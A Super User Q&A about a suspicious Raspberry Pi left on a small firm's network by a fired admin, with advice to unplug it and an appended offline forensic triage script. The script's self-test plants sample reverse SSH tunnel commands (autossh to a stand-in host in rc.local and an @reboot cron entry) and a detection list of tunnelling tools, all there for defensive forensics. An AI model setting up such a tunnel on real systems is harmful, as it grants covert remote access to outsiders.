What would be the role of a Raspberry Pi hooked to a hard disk and a VPN?


I'm trying to troubleshoot the network at the SME of my girlfriend: the previous network admin was more or less trying to blackmail them (for example refusing to give the passwords of the various devices: NAS etc. unless he'd get money) so they got rid of him.

Now we're changing all the passwords from all the computers, cams, NAS, etc. and I found something weird in the cellar, next to the rack: a little enclosure (not looking very professional, with apparently a hand-made hole to allow cables to pass into it). I opened it and it contains a Raspberry Pi hooked by USB to what is apparently a hard disk. There are two connections to that Raspberry: one USB cable to the hard disk and one ethernet cable which plugs into a TPLink VPN (the cable going to/from the Raspberry plugs into one of the four ethernet ports, not into the WAN port).

What would be the role of such a device in a "normal" company which has nothing to do with IT: it's a tax accounting company which has two small offices (hence the VPN)?

How can I find exactly what this Raspberry Pi is used for? (I'm concerned that by turning it off I'd mess up the network config.)

Could this be some backup thing?

Note that I don't know if superuser is the correct stackexchange site to ask such a question and, since I don't know what this Raspberry is used for, I don't know which tags to use.

Any help is very much appreciated.

Cedric Martin

Posted 2014-06-22T14:51:15.403

Reputation: 404

1Well if it doesn't seem like an essential function, I would unplug it NOW. If something breaks, you can plug it in - it might be a way for the guy who just got fired to get back into the network. – cutrightjm – 2014-06-22T15:15:09.980

Raspberry Pi is a mini $25 computer, which can easily run some Linux versions. If you plug it into a network, practically you can do everything. If its owner is a hacker, he can get into your network and steal info easily (including files, passwords etc). So my recommendation is - unplug it and look what's inside the hard drive. – Searush – 2014-06-22T15:31:23.857

@ekaj: and SEARAS too... Thanks, I did unplug it and everything seems to still be working fine. I'll see what the HD contains and if it's encrypted or not. Same for the SD card (?) that I found inside the Raspberry Pi. – Cedric Martin – 2014-06-22T15:39:07.627

@SEARAS: I did as you said. Labelled all the cables so in case it's an important feature I'll be able to plug it back in. – Cedric Martin – 2014-06-22T15:39:43.533

Yes, check the SD card too. There can be hack-tools. If you know Linux and if you are a hacker, then you can determine hack-tools easily (or give it to a hacker and he will tell you). Also having a (mini) computer attached to the target network enables anyone to get very sensitive information (e-mail, social site passwords etc), and he can even get full control of the network and all network computers (if he is smart enough). So if you find such hack-tools there, you must change all your personal passwords too (gmail, fb, etc). – Searush – 2014-06-22T17:31:35.100

Hackbox for allowing remote access to your network. MyLittlePwny or similar probably. – Fiasco Labs – 2014-06-22T18:00:33.870

Another form of it here: http://www.tunnelsup.com/raspberry-pi-phoning-home-using-a-reverse-remote-ssh-tunnel/ And there's even a custom OS over on SourceForge: http://pwnpi.sourceforge.net/ It's a heads up to watch for when you are dealing with a crook IT fool. – Fiasco Labs – 2014-06-22T18:06:39.623

A torrent seedbox perhaps? – usr-local-ΕΨΗΕΛΩΝ – 2016-02-16T22:05:33.810

Answers


Asking this is a bit like: what is the purpose of this book? It has two hardcovers, many pages, an index and a glossary. You will never know until you look into it.

The USB disk contains some data; its ethernet port allows communication with both LAN and WAN. I don't understand why you are claiming it is hooked into a VPN.

Raspberry Pis, though diminutive in size, are just full-purpose computers. You can write code running on them for just about anything. Given the nature of the person who set this up and its location, its most likely use is as a backdoor into your system. The use of a backdoor is once again as general as it can be, including generally all sorts of nefarious schemes.

It seems unlikely though that it performs any network-related useful task. In your shoes, I would just unhook it from your network, and see what is going on. In any case, even if it were performing anything useful, how could you trust that it does not perform anything mischievous on the side?

Apart from using a network monitoring tool (which would yield much precious information), you may want to check the contents of the disk (if it is encrypted, then you can be pretty sure it was being used for illicit schemes), and the SD card of the RPi. You can just plug the card into your PC, mount it and peruse the files that start automatically, i.e. the contents of /etc/init.d, /etc/rc.local, the existence of programs like autossh, openvpn and so on. Once again, if the card is encrypted, it is a safe bet he was up to something mischievous.

If you are really interested in this, and neither component is encrypted, then you may try using a hypervisor program (VirtualBox, HyperV, KVM, Xen, depending on your platform) to build a Virtual Machine booting from the SD card. There must be a billion Google references to Forensics in a Virtual Environment/Machine...

But most of all, I would very quickly unplug it.

MariusMatutiae

Posted 2014-06-22T14:51:15.403

Reputation: 41 321

Thanks a lot. I did unplug it. I said it was hooked to a VPN because the ethernet cable goes from the Raspberry Pi to a device which is obviously the VPN. However it was hooked into a "regular" ethernet connector: I don't know if a VPN device also works as a plain switch (I'm no network admin). Although I'm bad with Windows I'm proficient with Linux so I'll do the forensics as you suggested. Thanks a lot: I didn't realize that the Raspberry was something fully programmable like that. – Cedric Martin – 2014-06-22T15:42:35.843

@CedricMartin Someone can set up VPNs with any OS and a lot of different types of routers - just because it was plugged into a "regular" Ethernet port doesn't mean that there isn't a VPN. Also, I would have a friend that I trust look through the router/firewall for any fishy rules or such things - asap as well – cutrightjm – 2014-06-23T04:51:56.283
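The answer above suggests mounting the SD card on a PC and reading the places where things start automatically (/etc/rc.local, cron, the presence of autossh or openvpn). The script below is an added example of that triage, not code from the question, the answer or any project mentioned on the page. It assumes the card's root partition is already mounted read-only at some directory and only reads files from it; the tool list (autossh, openvpn) and the sample root filesystem it builds to demonstrate itself are constructed for this example.

```shell
#!/bin/sh
# Added example: offline triage of a Raspberry Pi root filesystem.
# Assumes the SD card's root partition is mounted read-only somewhere
# (for example: mount -o ro,noexec,nosuid /dev/mmcblk0p2 /mnt/pi) and never
# executes anything from the card; every check below only reads files.

# triage_rootfs ROOT: print every indicator found under ROOT, then print
# the total number of indicators as the last line of output.
triage_rootfs() {
    root=$1
    hits=0

    # 1. Commands run at the end of boot from /etc/rc.local
    #    (comments, blank lines and the trailing "exit 0" are ignored)
    if [ -f "$root/etc/rc.local" ]; then
        cmds=$(grep -vE '^[[:space:]]*(#|$|exit 0)' "$root/etc/rc.local" || true)
        if [ -n "$cmds" ]; then
            echo "$cmds" | sed 's/^/rc.local: /'
            hits=$((hits + $(echo "$cmds" | wc -l)))
        fi
    fi

    # 2. Cron jobs (system crontab, /etc/cron.d, per-user crontabs);
    #    an @reboot entry is the classic way to restart a tunnel after power loss
    for cf in "$root/etc/crontab" "$root"/etc/cron.d/* "$root"/var/spool/cron/crontabs/*; do
        [ -f "$cf" ] || continue
        jobs=$(grep -vE '^[[:space:]]*(#|$|[A-Z_]+=)' "$cf" || true)
        if [ -n "$jobs" ]; then
            echo "$jobs" | sed "s|^|cron ${cf#$root}: |"
            hits=$((hits + $(echo "$jobs" | wc -l)))
        fi
    done

    # 3. Tunnelling tools named in the answer, wherever Debian would install them
    #    (assumed list; extend it with whatever you consider suspicious)
    for tool in autossh openvpn; do
        for dir in usr/bin usr/sbin usr/local/bin usr/local/sbin bin sbin; do
            if [ -e "$root/$dir/$tool" ]; then
                echo "tool: /$dir/$tool"
                hits=$((hits + 1))
                break
            fi
        done
    done

    # 4. SSH public keys that would let someone log in without a password
    for ak in "$root"/root/.ssh/authorized_keys "$root"/home/*/.ssh/authorized_keys; do
        [ -f "$ak" ] || continue
        n=$(grep -cE '^(ssh-|ecdsa-)' "$ak" || true)
        if [ "$n" -gt 0 ]; then
            echo "authorized_keys ${ak#$root}: $n key(s)"
            hits=$((hits + n))
        fi
    done

    echo "$hits"
}

# Constructed sample: a tiny fake root filesystem containing the kind of
# entries a "phone home" setup leaves behind (not taken from any real device).
make_sample_rootfs() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/cron.d" "$d/usr/bin" "$d/home/pi/.ssh"
    cat > "$d/etc/rc.local" <<'EOF'
#!/bin/sh -e
# rc.local
/usr/bin/autossh -f -N -R 2222:localhost:22 tunnel@host.example
exit 0
EOF
    printf '@reboot root /usr/bin/autossh -N -R 2222:localhost:22 tunnel@host.example\n' > "$d/etc/cron.d/tunnel"
    : > "$d/usr/bin/autossh"
    printf 'ssh-rsa AAAA...EXAMPLE== tunnel@host.example\n' > "$d/home/pi/.ssh/authorized_keys"
    echo "$d"
}

# Stand-alone run: triage the constructed sample, then clean it up.
# On a real card, call triage_rootfs with the mount point instead.
sample=$(make_sample_rootfs)
triage_rootfs "$sample"
rm -rf "$sample"
```

A count of zero does not prove the card is clean (a service could be started from /etc/init.d or a systemd unit, which this script only reads if you add those paths), but anything it does list is worth reading in full before the device is ever powered on again.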